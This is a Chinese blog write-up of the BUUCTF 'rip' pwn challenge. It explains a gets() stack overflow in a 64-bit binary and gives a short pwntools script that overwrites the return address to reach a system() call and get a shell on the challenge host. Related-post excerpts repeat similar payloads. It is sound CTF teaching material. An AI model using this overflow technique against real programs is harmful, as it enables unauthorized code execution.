BUUCTF PWN-RIP详解

已于 2023-07-27 09:09:01 修改
阅读量6.2k 收藏 40
点赞数 12
CC 4.0 BY-SA版权
分类专栏: PWN 二进制 CTF 文章标签: kali linux 系统安全
于 2022-09-07 15:22:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_43780092/article/details/126746451
本文详细介绍了通过Linux ELF文件的静态分析发现栈溢出漏洞,并利用该漏洞构造exploit的过程。首先通过file命令识别64位文件,然后使用IDA64分析函数,发现gets()和system()函数,揭示了栈溢出和执行shell命令的可能性。通过计算栈帧空间,确定payload长度,最终构造payload远程连接靶机并成功执行命令,获取flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

首先看到无后缀文件,可以判断应该是Linux EIF文件,用Linux file命令看,发现是64位的文件

在这里插入图片描述
接着上IDA64进行静态分析,发现两个函数
在这里插入图片描述
main()函数按F5查看伪代码,发现危险函数gets,可以判断存在栈溢出漏洞


接着查看fun()函数,发现是system函数,system是c语言下的一个可以执行shell命令的函数
在这里插入图片描述

接下来思路就清晰了,我们需要利用gets函数获取一个长字符串覆盖rip来控制程序流到fun()函数

函数的局部变量会存放在他的栈中,那么在main函数中,我们双击s变量,查看s分配了多少空间

在这里插入图片描述

这里可以使用gbd动态调试,也可以简单点直接算

0x0-(-0x0f)=0xf

是15个字节的空间,也就是在main函数的栈帧中,给s划分了一个15字节的存储空间

因为是64位的EIF文件,所以rbp是8个字节
(如果对这部分不太理解,笔者做了PWN基础知识详解,可以阅读这篇文章)
https://blog.youkuaiyun.com/weixin_43780092/article/details/126694251
在这里插入图片描述

那么我们还需要8个自己的数据把Caller’s rbp的数据填满(当然在本题中应该是rbp,因为是64位的系统),这样可以溢出进入Return
Address了,所以接下来我们输入Return
Address(返回地址),也就是说,也就是fun函数的地址,地址我们可以看到是0x401186

在这里插入图片描述

现在可以构建exp了

from pwn import *  
p=remote("node4.buuoj.cn",29244) //靶机地址和端口
payload='A'*15+'B'*8+p64(0x401186+1).decode("iso-8859-1")
//char s的15个字节+RBP的8字节+fun函数入口地址,+1为了堆栈平衡,p64()发送数据时,是发送的字节流,也就是比特流(二进制流)。
p.sendline(payload)
p.interactive()

运行exp发现跑通了,先ls查看文件,发现flag

在这里插入图片描述
cat flag解出本题

在这里插入图片描述

有错误的地方欢迎指正交流!
-------------------------------------------------------------------------------------------------------------------------------请添加图片描述

BUUCTF-Pwn-rip
餐桌上的猫
11-14 2959
题目截图 使用IDA打开附件,反汇编为C语言找到两个函数 可以看到主函数中定义了一个字符类型的变量s(这里IDA出了点问题,实际上应该是char s[15]),并使用gets()对其进行赋值,那么这里便存在栈溢出的漏洞,我们只需要想办法执行函数fun()就可以获得shell,进而获得flag,从IDA中可以看出定义s的大小为15个字节 所以到达到溢出的目标位置就需要填充15+8=23个字节,另外从IDA中可以看出fun()的起始地址为0x401186 所以我们可以构造payload=‘a’*23+
BUUCTF PWN-堆题总结 2021-09-27
m0_56897090的博客
09-27 2469
文章目录整体分析-2021-09-27新角度TcacheUAFFile结构体HourseOfForceUnlink经验新角度ciscn_2019_final_5分析EXPTCACHEhitcon_2018_children_tcache分析EXPUAFwustctf2020_easyfast分析EXPACTF_2019_babyheap分析EXPgyctf_2020_some_thing_interesting分析EXPbjdctf_2020_YDSneedGrirlfrien分析EXPciscn_2019
BUUCTF(Pwn) rip
半岛铁盒的博客
03-20 583
按tab键,看一下 fun函数 发现其地址是 0x401186; 但是写EXP不能直接用这个地址,需要使用0x40118A这个地址,system函数是在0x40118A压参数然后执行 from pwn import * p = remote('node3.buuoj.cn', '25677') payload = 'a' * (0xf + 8) + p64(0x40118A) p.sendline(payload) p.interactive() ...
全面理解BUUCTF-rip1
最新发布
2301_76794844的博客
06-12 1369
全面理解BUUCTF-rip1
BUUCTF pwn——rip
CNS-Enterprise BCC-1701-J
03-10 379
BUUCTF 做题练习
[BUUCTF-pwn]——rip
Y_peak的博客
01-30 1312
BUUCTF——rip 题目地址:https://buuoj.cn/challenges 题目: 同样我们现将文件下载下来,在Linux上用checksec 看下信息,发现这是一个64位程序,并且任何保护都没开。???? (任何保护都没开,基本就是栈溢出) 在window用IDA反汇编看看,打扰了main函数没有任何有用的东西,没有我们要找的system函数 看看其他函数看看有没有,功夫不负有心人。fun函数中,有我们想要的东西 赶快查看下fun函数所在的位置 0x401186 。我们看到是在0x
pwn学习(3)BUUCTF-rip(函数知识/缓冲区溢出)
m0_66039322的博客
09-21 1036
1.函数调用栈是指程序运行时内存一段连续的区域。(特殊的内存)2.用来保存函数运行时的状态信息,包括函数参数与局部变量等。3.称之为‘栈’是因为发生函数调用时,调用函数(caller)的状态被保存在栈内,被调用函数(callee)的状态被压入调用栈的栈顶。4.在函数调用结束时,栈顶的函数(callee)状态被弹出,栈顶恢复到调用函数(caller)的状态5.函数调用栈在内存中从高地址向低地址生长,所以栈顶对应的内存地址在压栈时变小,退栈时变大。
BUUCTF (PWN) RIP详细分析
热门推荐
qy201706的博客
04-08 1万+
很简单的栈溢出,不过对于栈溢出具体过程不理解的会卡的很惨; 由于初学嘛,就看了网上的wp,好像都是之前版本的,现在用就不太对,可能我入坑BUUCTF比较晚,现在用的题都是运行在Ubuntu18上的,故需要考虑堆栈平衡~~
BUUCTF-rip 尝试PWN入门
brightendavid的博客
05-04 1723
BUUCTF-rip 拿到的是一个什么呢,感觉是一个小系统? 但是也就是一个小程序嘛。 这个程序就是执行一个输入输出 的命令。但是这里面存在漏洞。 这个s是15byte的字符 在fun部分有一个/bin/sh 这个据说是一个系统级函数,为什么说是系统级函数呢,因为有一个system吧。 一般会是什么用都没有。 但是在使用这样的一个payload后,就可以利用,也不知道这个pwn 库是做了什么。感觉像是变魔术。要刚好把堆栈覆盖到这个系统函数的位置?是不是这个解释呢。 #python3 需要预先安
BUUCTF PWN rip1 WP
m0_54262894的博客
07-31 2931
BUUCTF PWN rip 1 这是一个WP,也是一个自己练习过程的记录。 先把文件放入pwn机中检查一下,发现并没有开启保护,所以应该是一道简单题 我们运行一下试试,它让你输入一段字符然后将字符输出。 把文件放在ida中查看一下 发现main函数并不复杂,只是定义了一个 s ,而且我们很容易就能找到栈溢出的点,我们都知道gets函数是一个危险函数,对于我们来说它可以接受到无限的字符,所以这里就是我们要pwn掉的点。 我们双击 s ,看它有多少空...
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BUUCTF PWN wp--[第五空间2019 决赛]PWN5
2302_81740139的博客
09-01 1034
在这个上下文中,%10$n表示写入的值将是printf的第10个参数,但由于p32(0x804C044)没有在printf调用中作为参数,它实际上利用了格式化字符串漏洞,将栈上的某个值写入到地址0x804C044。p32函数将32位整数转换为其小端序的字符串表示,这里转换的是地址0x804C044,这个地址应该是之前提到的全局变量dword_804C044的地址。这个变量似乎是一个全局变量,其地址是硬编码的(例如,在ELF文件中,地址可能是一个固定的地址)。如果之前的利用成功,这将提供一个shell。
BUUCTFrip
^_^
12-08 3450
这题和蒸米ROP的level3有点像。 检查安全机制。 用ida反汇编,可以看到是gets函数有个简单的栈溢出,偏移也很好计算,F+8=23 此外还发现一个fun函数可以直接跳转到这里来获取shell。 正常exp如下: from pwn import * p = process("./pwn1") #p = remote("node3.buuoj.cn",29399) payload = "a" * 23 +p64(0x401186) p.sendline(payload) p.interact
初学pwn-BUUCTF(rip)
天柱的博客
08-30 2847
初学pwn-writeUp BUUCTF平台的一道题目,rip。 与之前同样的步骤,启动靶机,链接远端 发现这里提示输入一些内容,但是输入完成之后,这里就结束了。还是要打开文件查看一下。 看到这里,只有一个输入的过程可以操作,那就很清楚了,就是要栈溢出了。点进去看一下。 可以看到这里s这个数组是15个字节,到r这个返回值还需要8个字节。不过这里要注意的一点是,这个15是十进制的,不能像之前再在数字之前加0x标记十六进制,这里可以直接写十进制。 摁shift+f12,可以看到这时还有什么地址可能会用到,
BUUCTF_PWN - rip
weixin_46009088的博客
12-06 808
BUUCTF_PWN - rip 查看程序保护模式和文件基本信息: 没有什么保护,各条保护详情介绍请看胡写瞎写(1) pwntools常见命令,另外文件是64位小端程序 IDA载入 找到main函数F5: 发现一个 gets ( ) 函数,一个可以利用的漏洞点,gets ( ) 函数介绍: get( )函数简单易用,它读取从输入流中读取一行,赋给字符串变量s,直到遇到换行符,然后丢弃换行符,存储其余的字符,并在结尾添加一个空字符使其成为一个 C 字符串,但是它无法检查数组是否装的下,因此它只知道开始处,.
BUUCTF - PWNrip
古月浪子的博客
03-19 1736
checksec一下,发现啥保护也没开 IDA打开看看,明显的栈溢出漏洞,IDA给出了s的长度为0xf 发现后门函数 脚本中使用地址0x401186发现不行(不知道为什么),换成0x401187发现可以 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.l...
BUUCTF Pwn rip
weixin_41557838的博客
05-27 449
BUUCTF Pwn rip
BUUCTF-rip
m0_64180167的博客
04-11 735
看了这个文章 我起码能理解我们栈溢出的目的在做题之前 我们需要先理解栈的存储方法从上往下看 就能理解入栈说回这道题目为什么这道题目是栈溢出。
BUUCTF pwn rip
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP详解主要讲解了如何利用RIP寄存器来进行PWN攻击。RIP寄存器是存储下一条指令的地址,通过控制RIP寄存器的值,可以改变程序的执行流程,从而实现攻击的目的。 PWN攻击是一种利用软件漏洞来获取对计算机系统的控制权的攻击方式。在PWN攻击中,攻击者通常会利用程序中的漏洞,通过输入特定的数据来改变程序的执行流程,从而实现攻击的目的。 BUUCTF PWN-RIP详解文章提供了一些示例和技巧,帮助读者理解和掌握PWN攻击中利用RIP寄存器的方法。如果你对PWN攻击感兴趣,可以阅读该文章以获取更多详细信息。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值